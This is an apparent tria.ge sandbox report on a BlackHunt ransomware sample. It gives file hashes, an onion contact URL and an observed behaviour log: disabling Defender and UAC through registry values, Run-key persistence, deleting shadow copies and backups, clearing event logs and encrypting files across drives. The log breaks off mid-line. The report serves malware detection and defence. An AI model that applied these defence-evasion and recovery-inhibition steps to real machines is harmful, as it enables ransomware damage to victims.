Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
27s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:52
Static task
static1
Behavioral task
behavioral1
Sample
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
Resource
win10v2004-20231222-en
General
-
Target
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
-
Size
707KB
-
MD5
8f1b4a1ad35803c3e7306790ac78dadf
-
SHA1
559111015958073f9f462b82fbc1a44cdb420441
-
SHA256
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87
-
SHA512
b2199fa282ad6740f3e981e6c3b92fef7bd834ac6fb42134dd7953038aee2faea72c3efdf4684e1fb2ab2c6755942ed782ca0748ef860a895390c328da8f6c07
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Wvnh:6uaTmkZJ+naie5OTamgEoKxLWCoh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 10132 fsutil.exe 14728 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3392 wevtutil.exe 5192 wevtutil.exe 284 wevtutil.exe 11084 wevtutil.exe 12496 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9380 bcdedit.exe 9868 bcdedit.exe 9568 bcdedit.exe 10752 bcdedit.exe -
Renames multiple (3370) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10124 wbadmin.exe 14832 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\T: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\R: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\P: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\A: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\Y: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\V: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\O: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\H: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\J: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\U: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\X: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\B: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\N: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\M: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\S: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\G: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\K: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\L: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\Z: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\icu.md 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\he-il\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\java.policy 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\currency.data 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-disabled_32.svg 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\uk-ua\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Uninstall Information\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2112 10808 WerFault.exe 265 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3928 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2380 vssadmin.exe 3848 vssadmin.exe 3288 vssadmin.exe 5884 vssadmin.exe 4588 vssadmin.exe 10280 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 15676 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13988 PING.EXE -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeRestorePrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeBackupPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeTakeOwnershipPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeAuditPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeSecurityPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeIncBasePriorityPrivilege 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeBackupPrivilege 8436 vssvc.exe Token: SeRestorePrivilege 8436 vssvc.exe Token: SeAuditPrivilege 8436 vssvc.exe Token: SeBackupPrivilege 5520 wbengine.exe Token: SeRestorePrivilege 5520 wbengine.exe Token: SeSecurityPrivilege 5520 wbengine.exe Token: SeSecurityPrivilege 3392 wevtutil.exe Token: SeBackupPrivilege 3392 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1012 wrote to memory of 4604 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 42 PID 1012 wrote to memory of 4604 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 42 PID 1012 wrote to memory of 4632 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 43 PID 1012 wrote to memory of 4632 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 43 PID 1012 wrote to memory of 1508 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 166 PID 1012 wrote to memory of 1508 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 166 PID 1012 wrote to memory of 3612 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 45 PID 1012 wrote to memory of 3612 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 45 PID 1012 wrote to memory of 4912 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 46 PID 1012 wrote to memory of 4912 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 46 PID 1012 wrote to memory of 1400 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 1012 wrote to memory of 1400 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 1012 wrote to memory of 2324 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 164 PID 1012 wrote to memory of 2324 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 164 PID 1012 wrote to memory of 4936 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 162 PID 1012 wrote to memory of 4936 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 162 PID 4632 wrote to memory of 3336 4632 cmd.exe 50 PID 4632 wrote to memory of 3336 4632 cmd.exe 50 PID 1012 wrote to memory of 2548 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 51 PID 1012 wrote to memory of 2548 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 51 PID 1012 wrote to memory of 468 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 160 PID 1012 wrote to memory of 468 1012 